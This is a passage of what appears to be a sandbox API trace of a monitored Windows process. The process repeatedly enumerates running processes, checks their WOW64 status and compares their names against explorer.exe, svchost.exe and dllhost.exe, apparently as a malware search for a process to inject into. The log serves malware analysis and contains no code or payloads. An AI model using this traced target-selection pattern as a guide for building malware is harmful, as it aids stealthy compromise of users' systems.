lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0204.754] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0204.754] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0204.754] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0204.754] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0204.754] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.754] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.754] CloseHandle (hObject=0xec) returned 1 [0204.754] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0204.754] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0204.755] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0204.755] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0204.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0204.755] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.755] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.755] CloseHandle (hObject=0xec) returned 1 [0204.755] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0204.755] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0204.755] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0204.755] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0204.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0204.756] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.756] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.756] CloseHandle (hObject=0xec) returned 1 [0204.756] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0204.756] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0204.756] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0204.756] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0204.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0204.756] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.756] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.757] CloseHandle (hObject=0xec) returned 1 [0204.757] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0204.757] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0204.757] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0204.757] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0204.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0204.757] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.757] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.757] CloseHandle (hObject=0xec) returned 1 [0204.757] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0204.757] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0204.757] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0204.757] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0204.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0204.758] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.758] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.758] CloseHandle (hObject=0xec) returned 1 [0204.758] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0204.758] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0204.758] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0204.758] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0204.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0204.759] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.759] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.759] CloseHandle (hObject=0xec) returned 1 [0204.759] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0204.759] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0204.759] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0204.759] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0204.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0204.759] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.759] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.759] CloseHandle (hObject=0xec) returned 1 [0204.759] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0204.759] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0204.760] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0204.760] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0204.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0204.760] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.760] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.760] CloseHandle (hObject=0xec) returned 1 [0204.760] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0204.760] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0204.760] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0204.760] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0204.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0204.761] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.761] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.761] CloseHandle (hObject=0xec) returned 1 [0204.761] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0204.761] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0204.761] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0204.761] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0204.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0204.762] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.762] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.762] CloseHandle (hObject=0xec) returned 1 [0204.762] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0204.762] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0204.762] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0204.762] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0204.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0204.763] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0204.763] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0204.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0204.764] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0204.764] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0204.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0204.765] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0204.765] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0204.766] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.766] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.766] CloseHandle (hObject=0xec) returned 1 [0204.766] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0204.766] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0204.766] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.766] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.766] CloseHandle (hObject=0xec) returned 1 [0204.766] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0204.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0204.767] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0204.767] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.767] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.767] CloseHandle (hObject=0xec) returned 1 [0204.767] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0204.767] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.768] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0204.768] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.768] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.768] CloseHandle (hObject=0xec) returned 1 [0204.768] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.769] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0204.769] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0204.769] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.769] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.769] CloseHandle (hObject=0xec) returned 1 [0204.769] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0204.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0204.770] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.770] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0204.770] CloseHandle (hObject=0xec) returned 1 [0204.770] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0204.770] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0204.770] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0204.770] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0204.770] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0204.770] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0204.771] CloseHandle (hObject=0xe8) returned 1 [0204.771] Sleep (dwMilliseconds=0x3e8) [0205.810] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0205.812] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0205.813] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0205.813] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0205.813] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0205.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0205.814] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0205.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0205.814] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0205.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0205.815] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0205.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0205.815] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0205.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0205.816] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0205.816] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0205.816] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0205.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0205.817] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0205.817] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0205.817] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0205.818] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.818] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0205.818] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0205.819] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0205.819] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0205.820] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0205.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0205.820] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0205.821] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0205.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0205.821] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, 